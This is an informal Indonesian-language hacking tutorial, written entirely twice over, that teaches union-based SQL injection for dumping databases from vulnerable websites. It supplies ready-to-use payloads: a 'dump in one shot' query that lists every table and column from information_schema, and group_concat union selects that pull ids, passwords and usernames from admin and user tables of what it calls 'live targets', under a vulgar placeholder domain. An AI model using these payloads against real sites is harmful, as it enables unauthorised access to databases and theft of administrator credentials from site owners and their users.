SQLI DUMP
yoo whatshap sekarang kita belajar dump jika masih g ngerti tentang tutorial sql diatas mari kita ngedump bareng guys ok langsung ajah kita masuk materi
bahan
#hp
#kuota
#web dah di dios
#kesabaran
contoh gua punya laptarget
kontol.com/yoo.php?id=-1+union+select+1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))4,5--+-
ok contoh kita punya live target â˜
langsung ae kita exploit nih
group_concat(id,0x3a,password,0x3a,name),4.5+from+admin--+
ok disitu ada password dan namr ye jika nanti seadai nya ada tabel admin berbentuk
admin::id
admin::pass
admin::select
admin::right
kita ambil kata belakang nya menjadi
group_concat(id,0x3a,pass disini kita ubah jadi pass aturan password,0x3a,id disini ubah menjadi id aturan tadi user ),
hasil jadi kek gini
group_concat(id,0x3a,pass,0x3a,id),
jangan senang dulu di belakang colomb kita haru tambahkan nama depan dari tabel
contoh
gua punya tabel depan nya
admin::
admin::
kita exploit nya dengan
+from+admin--+
jika disitu bukan admin tapi user gsnti from+user ya guys ='v
jadi exploit nya gini
php?id=-1+union+select+1,2,group_concat(id,0x3a,pass,0x3a,user),3,4+from+user--+-
#info
untuk mencari password dan user admin nya dengan kata
user::password
user::id
user::email
itu bisa kita tebas â˜
admin::password
admin::id
admin::email
admin::user
itu vuln â˜
bahan
#hp
#kuota
#web dah di dios
#kesabaran
contoh gua punya laptarget
kontol.com/yoo.php?id=-1+union+select+1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))4,5--+-
ok contoh kita punya live target â˜
langsung ae kita exploit nih
group_concat(id,0x3a,password,0x3a,name),4.5+from+admin--+
ok disitu ada password dan namr ye jika nanti seadai nya ada tabel admin berbentuk
admin::id
admin::pass
admin::select
admin::right
kita ambil kata belakang nya menjadi
group_concat(id,0x3a,pass disini kita ubah jadi pass aturan password,0x3a,id disini ubah menjadi id aturan tadi user ),
hasil jadi kek gini
group_concat(id,0x3a,pass,0x3a,id),
jangan senang dulu di belakang colomb kita haru tambahkan nama depan dari tabel
contoh
gua punya tabel depan nya
admin::
admin::
kita exploit nya dengan
+from+admin--+
jika disitu bukan admin tapi user gsnti from+user ya guys ='v
jadi exploit nya gini
php?id=-1+union+select+1,2,group_concat(id,0x3a,pass,0x3a,user),3,4+from+user--+-
#info
untuk mencari password dan user admin nya dengan kata
user::password
user::id
user::email
itu bisa kita tebas â˜
admin::password
admin::id
admin::email
admin::user
itu vuln â˜